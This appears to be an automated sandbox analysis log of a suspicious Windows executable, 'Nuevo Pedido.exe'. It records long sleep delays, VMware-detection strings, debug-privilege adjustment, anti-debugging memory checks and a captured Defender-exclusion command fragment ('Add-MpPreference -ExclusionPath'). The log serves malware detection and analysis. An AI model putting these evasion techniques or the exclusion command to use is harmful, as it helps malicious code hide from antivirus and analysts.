            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238781Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238671Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238561Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238452Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238343Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238046Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237796Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237437Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237250Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 236890Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 236781Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeWindow / User API: threadDelayed 834Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeWindow / User API: threadDelayed 1723Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239843Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 32847Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239717Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239609Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239499Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239390Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239250Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239139Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239015Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238904Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238781Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238671Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238561Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238452Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238343Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238046Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237796Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237437Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 237250Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 236890Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 236781Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000005.00000000.290480181.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000005.00000000.290480181.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000005.00000000.290974701.0000000008BB0000.00000004.00000001.sdmpBinary or memory string: E#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
            Source: explorer.exe, 00000005.00000000.279912891.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
            Source: explorer.exe, 00000005.00000000.251514435.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
            Source: explorer.exe, 00000005.00000000.246577528.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
            Source: explorer.exe, 00000005.00000000.251514435.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004088D0 rdtsc 3_2_004088D0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A369A6 mov eax, dword ptr fs:[00000030h]3_2_01A369A6
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E2990 mov eax, dword ptr fs:[00000030h]3_2_019E2990
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EA185 mov eax, dword ptr fs:[00000030h]3_2_019EA185
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A351BE mov eax, dword ptr fs:[00000030h]3_2_01A351BE
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A351BE mov eax, dword ptr fs:[00000030h]3_2_01A351BE
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A351BE mov eax, dword ptr fs:[00000030h]3_2_01A351BE
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A351BE mov eax, dword ptr fs:[00000030h]3_2_01A351BE
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DC182 mov eax, dword ptr fs:[00000030h]3_2_019DC182
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E61A0 mov eax, dword ptr fs:[00000030h]3_2_019E61A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E61A0 mov eax, dword ptr fs:[00000030h]3_2_019E61A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A441E8 mov eax, dword ptr fs:[00000030h]3_2_01A441E8
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BB1E1 mov eax, dword ptr fs:[00000030h]3_2_019BB1E1
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BB1E1 mov eax, dword ptr fs:[00000030h]3_2_019BB1E1
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BB1E1 mov eax, dword ptr fs:[00000030h]3_2_019BB1E1
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B9100 mov eax, dword ptr fs:[00000030h]3_2_019B9100
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B9100 mov eax, dword ptr fs:[00000030h]3_2_019B9100
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B9100 mov eax, dword ptr fs:[00000030h]3_2_019B9100
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E513A mov eax, dword ptr fs:[00000030h]3_2_019E513A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E513A mov eax, dword ptr fs:[00000030h]3_2_019E513A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D4120 mov eax, dword ptr fs:[00000030h]3_2_019D4120
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D4120 mov eax, dword ptr fs:[00000030h]3_2_019D4120
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D4120 mov eax, dword ptr fs:[00000030h]3_2_019D4120
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D4120 mov eax, dword ptr fs:[00000030h]3_2_019D4120
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D4120 mov ecx, dword ptr fs:[00000030h]3_2_019D4120
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DB944 mov eax, dword ptr fs:[00000030h]3_2_019DB944
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DB944 mov eax, dword ptr fs:[00000030h]3_2_019DB944
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BB171 mov eax, dword ptr fs:[00000030h]3_2_019BB171
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BB171 mov eax, dword ptr fs:[00000030h]3_2_019BB171
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BC962 mov eax, dword ptr fs:[00000030h]3_2_019BC962
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B9080 mov eax, dword ptr fs:[00000030h]3_2_019B9080
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EF0BF mov ecx, dword ptr fs:[00000030h]3_2_019EF0BF
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EF0BF mov eax, dword ptr fs:[00000030h]3_2_019EF0BF
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EF0BF mov eax, dword ptr fs:[00000030h]3_2_019EF0BF
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A33884 mov eax, dword ptr fs:[00000030h]3_2_01A33884
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A33884 mov eax, dword ptr fs:[00000030h]3_2_01A33884
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F90AF mov eax, dword ptr fs:[00000030h]3_2_019F90AF
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h]3_2_019E20A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h]3_2_019E20A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h]3_2_019E20A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h]3_2_019E20A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h]3_2_019E20A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h]3_2_019E20A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h]3_2_01A4B8D0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4B8D0 mov ecx, dword ptr fs:[00000030h]3_2_01A4B8D0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h]3_2_01A4B8D0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h]3_2_01A4B8D0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h]3_2_01A4B8D0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h]3_2_01A4B8D0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B58EC mov eax, dword ptr fs:[00000030h]3_2_019B58EC
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E002D mov eax, dword ptr fs:[00000030h]3_2_019E002D
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E002D mov eax, dword ptr fs:[00000030h]3_2_019E002D
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E002D mov eax, dword ptr fs:[00000030h]3_2_019E002D
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E002D mov eax, dword ptr fs:[00000030h]3_2_019E002D
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E002D mov eax, dword ptr fs:[00000030h]3_2_019E002D
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A37016 mov eax, dword ptr fs:[00000030h]3_2_01A37016
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A37016 mov eax, dword ptr fs:[00000030h]3_2_01A37016
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A37016 mov eax, dword ptr fs:[00000030h]3_2_01A37016
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CB02A mov eax, dword ptr fs:[00000030h]3_2_019CB02A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CB02A mov eax, dword ptr fs:[00000030h]3_2_019CB02A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CB02A mov eax, dword ptr fs:[00000030h]3_2_019CB02A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CB02A mov eax, dword ptr fs:[00000030h]3_2_019CB02A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A84015 mov eax, dword ptr fs:[00000030h]3_2_01A84015
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A84015 mov eax, dword ptr fs:[00000030h]3_2_01A84015
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D0050 mov eax, dword ptr fs:[00000030h]3_2_019D0050
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D0050 mov eax, dword ptr fs:[00000030h]3_2_019D0050
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A72073 mov eax, dword ptr fs:[00000030h]3_2_01A72073
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A81074 mov eax, dword ptr fs:[00000030h]3_2_01A81074
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E2397 mov eax, dword ptr fs:[00000030h]3_2_019E2397
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A85BA5 mov eax, dword ptr fs:[00000030h]3_2_01A85BA5
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EB390 mov eax, dword ptr fs:[00000030h]3_2_019EB390
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C1B8F mov eax, dword ptr fs:[00000030h]3_2_019C1B8F
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C1B8F mov eax, dword ptr fs:[00000030h]3_2_019C1B8F
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A6D380 mov ecx, dword ptr fs:[00000030h]3_2_01A6D380
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7138A mov eax, dword ptr fs:[00000030h]3_2_01A7138A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E4BAD mov eax, dword ptr fs:[00000030h]3_2_019E4BAD
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E4BAD mov eax, dword ptr fs:[00000030h]3_2_019E4BAD
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E4BAD mov eax, dword ptr fs:[00000030h]3_2_019E4BAD
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A353CA mov eax, dword ptr fs:[00000030h]3_2_01A353CA
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A353CA mov eax, dword ptr fs:[00000030h]3_2_01A353CA
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019DDBE9 mov eax, dword ptr fs:[00000030h]3_2_019DDBE9
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h]3_2_019E03E2
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h]3_2_019E03E2
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h]3_2_019E03E2
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h]3_2_019E03E2
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h]3_2_019E03E2
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E03E2 mov eax, dword ptr fs:[00000030h]3_2_019E03E2
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7131B mov eax, dword ptr fs:[00000030h]3_2_01A7131B
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BF358 mov eax, dword ptr fs:[00000030h]3_2_019BF358
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BDB40 mov eax, dword ptr fs:[00000030h]3_2_019BDB40
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E3B7A mov eax, dword ptr fs:[00000030h]3_2_019E3B7A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E3B7A mov eax, dword ptr fs:[00000030h]3_2_019E3B7A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A88B58 mov eax, dword ptr fs:[00000030h]3_2_01A88B58
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BDB60 mov ecx, dword ptr fs:[00000030h]3_2_019BDB60
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019ED294 mov eax, dword ptr fs:[00000030h]3_2_019ED294
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019ED294 mov eax, dword ptr fs:[00000030h]3_2_019ED294
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CAAB0 mov eax, dword ptr fs:[00000030h]3_2_019CAAB0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CAAB0 mov eax, dword ptr fs:[00000030h]3_2_019CAAB0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EFAB0 mov eax, dword ptr fs:[00000030h]3_2_019EFAB0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B52A5 mov eax, dword ptr fs:[00000030h]3_2_019B52A5
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B52A5 mov eax, dword ptr fs:[00000030h]3_2_019B52A5
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B52A5 mov eax, dword ptr fs:[00000030h]3_2_019B52A5
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B52A5 mov eax, dword ptr fs:[00000030h]3_2_019B52A5
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B52A5 mov eax, dword ptr fs:[00000030h]3_2_019B52A5
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E2ACB mov eax, dword ptr fs:[00000030h]3_2_019E2ACB
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E2AE4 mov eax, dword ptr fs:[00000030h]3_2_019E2AE4
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D3A1C mov eax, dword ptr fs:[00000030h]3_2_019D3A1C
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B5210 mov eax, dword ptr fs:[00000030h]3_2_019B5210
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B5210 mov ecx, dword ptr fs:[00000030h]3_2_019B5210
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B5210 mov eax, dword ptr fs:[00000030h]3_2_019B5210
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B5210 mov eax, dword ptr fs:[00000030h]3_2_019B5210
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BAA16 mov eax, dword ptr fs:[00000030h]3_2_019BAA16
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BAA16 mov eax, dword ptr fs:[00000030h]3_2_019BAA16
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C8A0A mov eax, dword ptr fs:[00000030h]3_2_019C8A0A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7AA16 mov eax, dword ptr fs:[00000030h]3_2_01A7AA16
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7AA16 mov eax, dword ptr fs:[00000030h]3_2_01A7AA16
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F4A2C mov eax, dword ptr fs:[00000030h]3_2_019F4A2C
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F4A2C mov eax, dword ptr fs:[00000030h]3_2_019F4A2C
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A6B260 mov eax, dword ptr fs:[00000030h]3_2_01A6B260
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A6B260 mov eax, dword ptr fs:[00000030h]3_2_01A6B260
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A88A62 mov eax, dword ptr fs:[00000030h]3_2_01A88A62
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B9240 mov eax, dword ptr fs:[00000030h]3_2_019B9240
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B9240 mov eax, dword ptr fs:[00000030h]3_2_019B9240
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B9240 mov eax, dword ptr fs:[00000030h]3_2_019B9240
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B9240 mov eax, dword ptr fs:[00000030h]3_2_019B9240
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F927A mov eax, dword ptr fs:[00000030h]3_2_019F927A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7EA55 mov eax, dword ptr fs:[00000030h]3_2_01A7EA55
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A44257 mov eax, dword ptr fs:[00000030h]3_2_01A44257
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A805AC mov eax, dword ptr fs:[00000030h]3_2_01A805AC
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A805AC mov eax, dword ptr fs:[00000030h]3_2_01A805AC
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EFD9B mov eax, dword ptr fs:[00000030h]3_2_019EFD9B
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EFD9B mov eax, dword ptr fs:[00000030h]3_2_019EFD9B
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B2D8A mov eax, dword ptr fs:[00000030h]3_2_019B2D8A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B2D8A mov eax, dword ptr fs:[00000030h]3_2_019B2D8A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B2D8A mov eax, dword ptr fs:[00000030h]3_2_019B2D8A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B2D8A mov eax, dword ptr fs:[00000030h]3_2_019B2D8A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B2D8A mov eax, dword ptr fs:[00000030h]3_2_019B2D8A
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E2581 mov eax, dword ptr fs:[00000030h]3_2_019E2581
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E2581 mov eax, dword ptr fs:[00000030h]3_2_019E2581
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E2581 mov eax, dword ptr fs:[00000030h]3_2_019E2581
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E2581 mov eax, dword ptr fs:[00000030h]3_2_019E2581
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E1DB5 mov eax, dword ptr fs:[00000030h]3_2_019E1DB5
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E1DB5 mov eax, dword ptr fs:[00000030h]3_2_019E1DB5
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E1DB5 mov eax, dword ptr fs:[00000030h]3_2_019E1DB5
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E35A1 mov eax, dword ptr fs:[00000030h]3_2_019E35A1
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7FDE2 mov eax, dword ptr fs:[00000030h]3_2_01A7FDE2
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7FDE2 mov eax, dword ptr fs:[00000030h]3_2_01A7FDE2
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7FDE2 mov eax, dword ptr fs:[00000030h]3_2_01A7FDE2
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7FDE2 mov eax, dword ptr fs:[00000030h]3_2_01A7FDE2
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A68DF1 mov eax, dword ptr fs:[00000030h]3_2_01A68DF1
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36DC9 mov eax, dword ptr fs:[00000030h]3_2_01A36DC9
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36DC9 mov eax, dword ptr fs:[00000030h]3_2_01A36DC9
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36DC9 mov eax, dword ptr fs:[00000030h]3_2_01A36DC9
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36DC9 mov ecx, dword ptr fs:[00000030h]3_2_01A36DC9
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36DC9 mov eax, dword ptr fs:[00000030h]3_2_01A36DC9
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A36DC9 mov eax, dword ptr fs:[00000030h]3_2_01A36DC9
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CD5E0 mov eax, dword ptr fs:[00000030h]3_2_019CD5E0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CD5E0 mov eax, dword ptr fs:[00000030h]3_2_019CD5E0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A3A537 mov eax, dword ptr fs:[00000030h]3_2_01A3A537
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A88D34 mov eax, dword ptr fs:[00000030h]3_2_01A88D34
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7E539 mov eax, dword ptr fs:[00000030h]3_2_01A7E539
